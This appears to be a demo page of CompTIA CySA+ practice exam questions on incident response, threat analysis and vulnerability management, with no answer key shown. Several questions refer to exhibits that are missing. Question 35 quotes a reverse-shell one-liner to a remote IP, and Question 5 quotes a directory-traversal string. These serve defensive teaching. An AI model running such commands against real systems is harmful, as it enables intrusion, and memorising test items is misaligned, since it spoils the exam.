Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70percent

CompTIA CS0-003 CompTIA CySA+ Certification Beta Exam Exam Practice Test

Demo: 89 questions
Total 303 questions

CompTIA CySA+ Certification Beta Exam Questions and Answers

Question 1

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Select two).

Options:

A.

Hostname

B.

Missing KPI

C.

CVE details

D.

POC availability

E.

loCs

F.

npm identifier

Question 2

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

Options:

A.

Data enrichment

B.

Security control plane

C.

Threat feed combination

D.

Single pane of glass

Question 3

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

Options:

A.

SQL injection

B.

Local file inclusion

C.

Cross-site scripting

D.

Directory traversal

Question 4

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Question 5

While reviewing the web server logs a security analyst notices the following snippet

..\../..\../boot.ini

Which of the following is being attempted?

Options:

A.

Directory traversal

B.

Remote file inclusion

C.

Cross-site scripting

D.

Remote code execution

E.

Enumeration of/etc/pasawd

Question 6

During an internal code review, software called "ACE" was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is in a legacy, third-party vendor resource that is used by the ACE software. ACE is used worldwide and is essential for many businesses in this industry. Developers informed the Chief Information Security Officer that removal of the vulnerability will take time. Which of the following is the first action to take?

Options:

A.

Look for potential loCs in the company.

B.

Inform customers of the vulnerability.

C.

Remove the affected vendor resource from the ACE software.

D.

Develop a compensating control until the issue can be fixed permanently.

Question 7

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following.

  • There must be one primary server or service per device.
  • Only default port should be used
  • Non- secure protocols should be disabled.
  • The corporate internet presence should be placed in a protected subnet

Instructions :

  • Using the available tools, discover devices on the corporate network and the services running on these devices.

You must determine

  • ip address of each device
  • The primary server or service each device
  • The protocols that should be disabled based on the hardening guidelines

Options:

Question 8

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been

compromised. Which of the following steps should the administrator take next?

Options:

A.

Inform the internal incident response team.

B.

Follow the company's incident response plan.

C.

Review the lessons learned for the best approach.

D.

Determine when the access started.

Question 9

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice? (Select two).

Options:

A.

Law enforcement

B.

Governance

C.

Legal

D.

Manager

E.

Public relations

F.

Human resources

Question 10

A small company does no! have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

Options:

A.

Corrective controls

B.

Compensating controls

C.

Operational controls

D.

Administrative controls

Question 11

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

Options:

A.

Credentialed network scanning

B.

Passive scanning

C.

Agent-based scanning

D.

Dynamic scanning

Question 12

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

Options:

A.

wh4dc-748gy.lan (192.168.86.152)

B.

lan (192.168.86.22)

C.

imaging.lan (192.168.86.150)

D.

xlaptop.lan (192.168.86.249)

E.

p4wnp1_aloa.lan (192.168.86.56)

Question 13

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

Options:

A.

Vulnerability A

B.

Vulnerability B

C.

Vulnerability C

D.

Vulnerability D

Question 14

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

Options:

A.

config. ini

B.

ntds.dit

C.

Master boot record

D.

Registry

Question 15

A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost.

Which of the following risk treatments best describes what the CISO is looking for?

Options:

A.

Transfer

B.

Mitigate

C.

Accept

D.

Avoid

Question 16

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

Options:

A.

OSSTMM

B.

SIEM

C.

SOAR

D.

QVVASP

Question 17

A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

Options:

A.

The host is not up or responding.

B.

The host is running excessive cipher suites.

C.

The host is allowing insecure cipher suites.

D.

The Secure Shell port on this host is closed

Question 18

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

Options:

A.

Access rights

B.

Network segmentation

C.

Time synchronization

D.

Invalid playbook

Question 19

A security analyst reviews the following Arachni scan results for a web application that stores PII data:

Which of the following should be remediated first?

Options:

A.

SQL injection

B.

RFI

C.

XSS

D.

Code injection

Question 20

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause?

(Select two).

Options:

A.

Creation time of dropper

B.

Registry artifacts

C.

EDR data

D.

Prefetch files

E.

File system metadata

F.

Sysmon event log

Question 21

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Options:

A.

Command and control

B.

Data enrichment

C.

Automation

D.

Single sign-on

Question 22

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

• created the initial evidence log.

• disabled the wireless adapter on the device.

• interviewed the employee, who was unable to identify the website that was accessed

• reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

Options:

A.

Update the system firmware and reimage the hardware.

B.

Install an additional malware scanner that will send email alerts to the analyst.

C.

Configure the system to use a proxy server for Internet access.

D.

Delete the user profile and restore data from backup.

Question 23

Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?

Options:

A.

CASB

B.

DMARC

C.

SIEM

D.

PAM

Question 24

After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily

at 10:00 p.m. Which of the following is potentially occurring?

Options:

A.

Irregular peer-to-peer communication

B.

Rogue device on the network

C.

Abnormal OS process behavior

D.

Data exfiltration

Question 25

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

Options:

A.

PAM

B.

IDS

C.

PKI

D.

DLP

Question 26

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

Options:

A.

It provides analytical pivoting and identifies knowledge gaps.

B.

It guarantees that the discovered vulnerability will not be exploited again in the future.

C.

It provides concise evidence that can be used in court

D.

It allows for proactive detection and analysis of attack events

Question 27

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

Options:

A.

Shut down the server.

B.

Reimage the server

C.

Quarantine the server

D.

Update the OS to latest version.

Question 28

A cybersecurity analyst is recording the following details

* ID

* Name

* Description

* Classification of information

* Responsible party

In which of the following documents is the analyst recording this information?

Options:

A.

Risk register

B.

Change control documentation

C.

Incident response playbook

D.

Incident response plan

Question 29

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

Options:

A.

Insider threat

B.

Ransomware group

C.

Nation-state

D.

Organized crime

Question 30

A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?

Options:

A.

Trends

B.

Risk score

C.

Mitigation

D.

Prioritization

Question 31

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

Options:

A.

function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B.

function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C.

function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D.

function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

Question 32

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades Which of the following is the best method to remediate the bugs?

Options:

A.

Reschedule the upgrade and deploy the patch

B.

Request an exception to exclude the patch from installation

C.

Update the risk register and request a change to the SLA

D.

Notify the incident response team and rerun the vulnerability scan

Question 33

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

Options:

A.

Reduce the administrator and privileged access accounts

B.

Employ a network-based IDS

C.

Conduct thorough incident response

D.

Enable SSO to enterprise applications

Question 34

After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the

following did the change management team fail to do?

Options:

A.

Implementation

B.

Testing

C.

Rollback

D.

Validation

Question 35

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

Options:

A.

RCE

B.

Reverse shell

C.

XSS

D.

SQL injection

Question 36

Given the following CVSS string-

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H

Which of the following attributes correctly describes this vulnerability?

Options:

A.

A user is required to exploit this vulnerability.

B.

The vulnerability is network based.

C.

The vulnerability does not affect confidentiality.

D.

The complexity to exploit the vulnerability is high.

Question 37

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

Options:

A.

Disable the user's network account and access to web resources

B.

Make a copy of the files as a backup on the server.

C.

Place a legal hold on the device and the user's network share.

D.

Make a forensic image of the device and create a SRA-I hash.

Question 38

A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these events below:

Which of the following statements best describes the intent of the attacker, based on this one-liner?

Options:

A.

Attacker is escalating privileges via JavaScript.

B.

Attacker is utilizing custom malware to download an additional script.

C.

Attacker is executing PowerShell script "AccessToken.psr.

D.

Attacker is attempting to install persistence mechanisms on the target machine.

Question 39

An analyst investigated a website and produced the following:

Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

Options:

A.

nmap -sS -T4 -F insecure.org

B.

nmap -o insecure.org

C.

nmap -sV -T4 -F insecure.org

D.

nmap -A insecure.org

Question 40

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to

reduce risks associated with the application development?

Options:

A.

Perform static analyses using an integrated development environment.

B.

Deploy compensating controls into the environment.

C.

Implement server-side logging and automatic updates.

D.

Conduct regular code reviews using OWASP best practices.

Question 41

A company brings in a consultant to make improvements to its website. After the consultant leaves. a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team:

Which of the following did the consultant do?

Options:

A.

Implanted a backdoor

B.

Implemented privilege escalation

C.

Implemented clickjacking

D.

Patched the web server

Question 42

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

Options:

A.

Performing dynamic application security testing

B.

Reviewing the code

C.

Fuzzing the application

D.

Debugging the code

E.

Implementing a coding standard

F.

Implementing IDS

Question 43

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output:

[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx

[-] XSS: Analyzing response #1...

[-] XSS: Analyzing response #2...

[-] XSS: Analyzing response #3...

[+] XSS: Response is tainted. Looking for proof of the vulnerability.

Which of the following is the most likely reason for this vulnerability?

Options:

A.

The developer set input validation protection on the specific field of search.aspx.

B.

The developer did not set proper cross-site scripting protections in the header.

C.

The developer did not implement default protections in the web application build.

D.

The developer did not set proper cross-site request forgery protections.

Question 44

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization's network?

Options:

A.

Utilize an RDP session on an unused workstation to evaluate the malware.

B.

Disconnect and utilize an existing infected asset off the network.

C.

Create a virtual host for testing on the security analyst workstation.

D.

Subscribe to an online service to create a sandbox environment.

Question 45

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

Options:

A.

Weaponization

B.

Reconnaissance

C.

Delivery

D.

Exploitation

Question 46

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

Options:

A.

Shut the network down immediately and call the next person in the chain of command.

B.

Determine what attack the odd characters are indicative of

C.

Utilize the correct attack framework and determine what the incident response will consist of.

D.

Notify the local law enforcement for incident response

Question 47

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

Options:

A.

SLA

B.

MOU

C.

NDA

D.

Limitation of liability

Question 48

An organization's email account was compromised by a bad actor. Given the following Information:

Which of the following is the length of time the team took to detect the threat?

Options:

A.

25 minutes

B.

40 minutes

C.

45 minutes

D.

2 hours

Question 49

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Options:

A.

Deploy a database to aggregate the logging.

B.

Configure the servers to forward logs to a SIEM-

C.

Share the log directory on each server to allow local access,

D.

Automate the emailing of logs to the analysts.

Question 50

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

Options:

A.

Mean time to detect

B.

Mean time to respond

C.

Mean time to remediate

D.

Service-level agreement uptime

Question 51

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?

Options:

A.

Hacktivist

B.

Organized crime

C.

Nation-state

D.

Lone wolf

Question 52

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being

used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

Options:

A.

Leave the proxy as is.

B.

Decomission the proxy.

C.

Migrate the proxy to the cloud.

D.

Patch the proxy

Question 53

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:

Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?

Options:

A.

SQL injection

B.

LFI

C.

XSS

D.

CSRF

Question 54

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Question 55

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

Options:

A.

Human resources must email a copy of a user agreement to all new employees

B.

Supervisors must get verbal confirmation from new employees indicating they have read the user agreement

C.

All new employees must take a test about the company security policy during the cjitoardmg process

D.

All new employees must sign a user agreement to acknowledge the company security policy

Question 56

Which of the following would an organization use to develop a business continuity plan?

Options:

A.

A diagram of all systems and interdependent applications

B.

A repository for all the software used by the organization

C.

A prioritized list of critical systems defined by executive leadership

D.

A configuration management database in print at an off-site location

Question 57

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

Options:

A.

Disable administrative accounts for any operations.

B.

Implement MFA requirements for all internal resources.

C.

Harden systems by disabling or removing unnecessary services.

D.

Implement controls to block execution of untrusted applications.

Question 58

A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks?

Options:

A.

A web application firewall

B.

A network intrusion detection system

C.

A vulnerability scanner

D.

A web proxy

Question 59

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

Options:

A.

Running regular penetration tests to identify and address new vulnerabilities

B.

Conducting regular security awareness training of employees to prevent social engineering attacks

C.

Deploying an additional layer of access controls to verify authorized individuals

D.

Implementing intrusion detection software to alert security teams of unauthorized access attempts

Question 60

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

Options:

A.

Uncredentialed scan

B.

Discqyery scan

C.

Vulnerability scan

D.

Credentialed scan

Question 61

An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.

which are more important than ensuring vendor data access.

Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?

Options:

A.

121.19.30.221

B.

134.17.188.5

C.

202.180.1582

D.

216.122.5.5

Question 62

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Options:

A.

Disk contents

B.

Backup data

C.

Temporary files

D.

Running processes

Question 63

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

Options:

A.

MFA

B.

User and password

C.

PAM

D.

Key pair

Question 64

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?

Options:

A.

Non-repudiation

B.

Authentication

C.

Authorization

D.

Integrity

Question 65

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

Options:

A.

Impact

B.

Vulnerability score

C.

Mean time to detect

D.

Isolation

Question 66

An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working?

Options:

A.

The firewall service account was locked out.

B.

The firewall was using a paid feed.

C.

The firewall certificate expired.

D.

The firewall failed open.

Question 67

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

Options:

A.

DLP

B.

NAC

C.

EDR

D.

NIDS

Question 68

An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?

Options:

A.

Multifactor authentication

B.

Password changes

C.

System hardening

D.

Password encryption

Question 69

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

Options:

A.

Transfer

B.

Accept

C.

Mitigate

D.

Avoid

Question 70

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server:

Which of the following recommendations should the security analyst provide to harden the web server?

Options:

A.

Remove the version information on http-server-header.

B.

Disable tcp_wrappers.

C.

Delete the /wp-login.php folder.

D.

Close port 22.

Question 71

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

Options:

A.

The current scanners should be migrated to the cloud

B.

Cloud-specific misconfigurations may not be detected by the current scanners

C.

Existing vulnerability scanners cannot scan laaS systems

D.

Vulnerability scans on cloud environments should be performed from the cloud

Question 72

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?

Options:

A.

Blocklisting

B.

Allowlisting

C.

Graylisting

D.

Webhooks

Question 73

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

Options:

A.

Log retention

B.

Log rotation

C.

Maximum log size

D.

Threshold value

Question 74

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

Options:

A.

To satisfy regulatory requirements for incident reporting

B.

To hold other departments accountable

C.

To identify areas of improvement in the incident response process

D.

To highlight the notable practices of the organization's incident response team

Question 75

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:

getconnection (database01, "alpha " , "AXTV. 127GdCx94GTd") ;

Which of the following is the most likely vulnerability in this system?

Options:

A.

Lack of input validation

B.

SQL injection

C.

Hard-coded credential

D.

Buffer overflow attacks

Question 76

Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?

Options:

A.

Remediation level

B.

Exploit code maturity

C.

Report confidence

D.

Availability

Question 77

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

Options:

A.

Exploitation

B.

Reconnaissance

C.

Command and control

D.

Actions on objectives

Question 78

A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next?

Options:

A.

Preparation

B.

Validation

C.

Containment

D.

Eradication

Question 79

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.

Cross-reference the signature with open-source threat intelligence.

B.

Configure the EDR to perform a full scan.

C.

Transfer the malware to a sandbox environment.

D.

Log in to the affected systems and run necstat.

Question 80

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

Options:

A.

Nmap

B.

TCPDump

C.

SIEM

D.

EDR

Question 81

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

Options:

A.

Perform OS hardening.

B.

Implement input validation.

C.

Update third-party dependencies.

D.

Configure address space layout randomization.

Question 82

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

Options:

A.

Deploy agents on all systems to perform the scans.

B.

Deploy a central scanner and perform non-credentialed scans.

C.

Deploy a cloud-based scanner and perform a network scan.

D.

Deploy a scanner sensor on every segment and perform credentialed scans.

Question 83

A security audit for unsecured network services was conducted, and the following output was generated:

Which of the following services should the security team investigate further? (Select two).

Options:

A.

21

B.

22

C.

23

D.

636

E.

1723

F.

3389

Question 84

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

Options:

A.

Upload the binary to an air gapped sandbox for analysis

B.

Send the binaries to the antivirus vendor

C.

Execute the binaries on an environment with internet connectivity

D.

Query the file hashes using VirusTotal

Question 85

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

Options:

A.

PCI Security Standards Council

B.

Local law enforcement

C.

Federal law enforcement

D.

Card issuer

Question 86

A security analyst reviews the following results of a Nikto scan:

Which of the following should the security administrator investigate next?

Options:

A.

tiki

B.

phpList

C.

shtml.exe

D.

sshome

Question 87

When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

Options:

A.

CASB

B.

SASE

C.

ZTNA

D.

SWG

Question 88

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

Options:

A.

Clone the virtual server for forensic analysis

B.

Log in to the affected server and begin analysis of the logs

C.

Restore from the last known-good backup to confirm there was no loss of connectivity

D.

Shut down the affected server immediately

Question 89

While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?

Options:

A.

If appropriate logging levels are set

B.

NTP configuration on each system

C.

Behavioral correlation settings

D.

Data normalization rules

Demo: 89 questions
Total 303 questions